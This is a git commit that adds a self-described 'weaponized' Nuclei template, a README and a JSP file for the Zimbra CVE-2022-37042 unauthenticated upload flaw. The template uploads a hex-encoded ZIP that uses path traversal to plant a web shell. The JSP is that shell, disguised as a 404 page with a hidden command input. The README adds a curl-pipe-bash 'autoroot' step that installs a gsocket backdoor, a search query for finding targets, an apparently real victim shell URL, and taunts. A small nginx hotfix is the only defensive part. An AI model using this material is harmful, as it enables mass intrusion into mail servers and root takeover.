update CVE-2022-37042

Signed-off-by: anthonytutu <tuyuchun@buaa.edu.cn>

cve/Zimbra/2022/CVE-2022-37042/CVE-2022-37042-shell-upload.yaml

@@ -0,0 +1,46 @@
+id: CVE-2022-37042
+
+info:
+  name: Zimbra Collaboration Suite - Unauthenticated RCE + Shell upload
+  author: Aels
+  severity: critical
+  description: |
+    Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. This issue exists because of an incomplete fix for CVE-2022-27925.
+  reference:
+    - https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-37042
+    - https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/
+    - https://github.com/vnhacker1337/CVE-2022-27925-PoC
+  metadata:
+    fofa-query: app="zimbra"
+    shodan-query: http.favicon.hash:"1624375939"
+  tags: cve,cve2022,zimbra,rce,unauth,kev
+
+requests:
+  - raw:
+      - |
+        POST {{path}} HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        content-type: application/x-www-form-urlencoded
+
+        {{hex_decode("504b0304140000000800fa58145556a5e365950100003103000058001c002e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6f70742f7a696d6272612f6d61696c626f78642f776562617070732f7a696d6272612f7075626c69632f666f726d61747465722e6a7370555409000368a4006369a4006375780b000104f501000004140000008d52d14ee330107ccf572c962a25707140e2099208514020415b15ee037ccd528c12dbd81bd20af5dfcf4e535d8510871fecf17a66762c3b1f5d80114b04d9186da960afe25df09664cd0f7ff5586a7ec84665941fa4292c5f3281b58334f585db93321f5f4f9eaee7e5e9f1294c34c18d6e5595674335cf02e5663a7f00b120a955c15899df4d66bf9f80d6060b46b822064a341e2f9a8a81a375edf11f6d2bb467c79e9e05bdef662cfa7914c967882dbeb5e8882f9166c27a35a18d7b83040e0a506d5d27f011811fba256eac5454ab988d75d308559d018323f8cee408587e392f5972de9bccac5ea07360b6db10011ed78eb0e9d5561bb4b48e99763cdc85259cf4bdeed08e85c338e15255b89a3ec7acf348776e1b333d49b619c33050c0bc55241b0c9e03f45a5ce1a28f151064e3ff651f226ffad9bf15feb4c74f3da72d99961ec9a268403bef698266bf1c0f823bf58f29d58eb957dd11af04897d722583afc2eef3492cd520f17ba99681693dd52fdc9f57f752e1ceb47b9135fa97ea29c3b780affe45200c9a6fec36d1261a957f01504b01021e03140000000800fa58145556a5e3659501000031030000580018000000000001000000a481000000002e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6f70742f7a696d6272612f6d61696c626f78642f776562617070732f7a696d6272612f7075626c69632f666f726d61747465722e6a7370555405000368a4006375780b000104f50100000414000000504b050600000000010001009e0000002702000000000a")}}
+
+      - |
+        GET /public/formatter.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      path:
+        - /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1
+        - /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd
+
+    stop-at-first-match: true
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 401'
+          - 'status_code_2 == 200'
+          - "contains(body_2,'gh/aels')"
+        condition: and

cve/Zimbra/2022/CVE-2022-37042/README.md

@@ -0,0 +1,35 @@
+# CVE-2022-37042
+<img width="918" alt="image" src="https://user-images.githubusercontent.com/1212294/186645204-ba8e7f0d-fbf0-4392-aab0-7924e48dcf77.png">
+
+# Zimbra CVE-2022-37042 Nuclei weaponized template
+
+shell path: `/public/formatter.jsp`
+
+Nuclei itself: https://github.com/projectdiscovery/nuclei
+
+shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press \[Enter\] key:
+
+<img width="838" alt="image" src="https://user-images.githubusercontent.com/1212294/187246401-ce867e01-de9f-4344-bc98-fb67e635632a.png">
+
+example shell url:
+```
+https://ms1.fission.com:8443/public/formatter.jsp?cmd=id
+```
+
+# CVE-2022-37042 hotfix to patch owned servers
+issue this command (but only once):
+```
+cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;
+```
+need additional code to servers with not Nginx but Apache. Pull requests are wellcome.
+
+# Zimbra autoroot via zimbslap
+```
+curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1
+```
+this command will install global-socket (https://www.gsocket.io/deploy/) and pass you the key to connect as root.
+
+# get zimbra ips
+https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=100&virtual_hosts=EXCLUDE&q=services.http.response.html_tags%3A+%22%3Ctitle%3EZimbra+Web+Client+Sign+In%22
+
+happy birthday massacre, motherfuckers ;)

cve/Zimbra/2022/CVE-2022-37042/formatter.jsp

@@ -0,0 +1,25 @@
+<!-- gh/aels -->
+<H1><CENTER>404 Not Found</CENTER></H1>
+<%@ page import="java.io.*" %>
+<%
+    String cmd = request.getParameter("cmd");
+    String output = "";
+    String error = "";
+    if(cmd != null) {
+        String[] commandAndArgs = new String[]{ "/bin/bash", "-c", cmd };
+        String s = null;
+        Process process = Runtime.getRuntime().exec(commandAndArgs);
+        InputStream inputStream = process.getInputStream();
+        BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
+        Thread.sleep(2000);
+        while(process.isAlive()) Thread.sleep(100);
+        while((s = reader.readLine()) != null) { output += s+"\n"; }
+        reader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
+        while((s = reader.readLine()) != null) { error += s+"\n"; }
+    }
+%>
+<FORM><INPUT name=cmd style=border:0;display:block; type=text value='<%=cmd %>'></FORM>
+<pre>
+    <%=output %>
+    <%=error %>
+</pre>